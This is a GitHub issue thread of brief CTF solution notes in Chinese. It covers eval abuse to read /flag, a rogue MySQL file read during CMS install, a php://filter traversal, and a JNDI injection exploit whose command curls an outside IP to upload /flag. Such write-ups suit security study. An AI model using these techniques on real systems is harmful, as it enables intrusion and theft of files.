Aaisui
commented
3 years ago 
Open Aaisui opened 3 years ago
Aaisui
commented
3 years ago
Aaisui
commented
3 years ago 这题不知道啥意思,贼简单,他直接eval了应该是,而且题目还提示让你readFile。所以直接readFile('/flag')完事了
Aaisui
commented
3 years ago 这道题重点在于安装mysql那一步,
默认会用PDO链接,但是我们可以抓包修改为Mysqli,这样就可以构造恶意mysql然后文件读取了,但是我有点奇怪,难道其他cms就不行吗。。安装数据库的时候都可以吧。。?
Aaisui
commented
3 years ago 
php://filter/resource=./files/convert.base64-decode/../(文件名)
这样依然可以生效。
java题目配置环境能配置一辈子: 红明谷杯: javaweb
用这个启动:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'curl http://81.69.201.65:1234 -F file=@/flag'
然后用这个打:
得到flag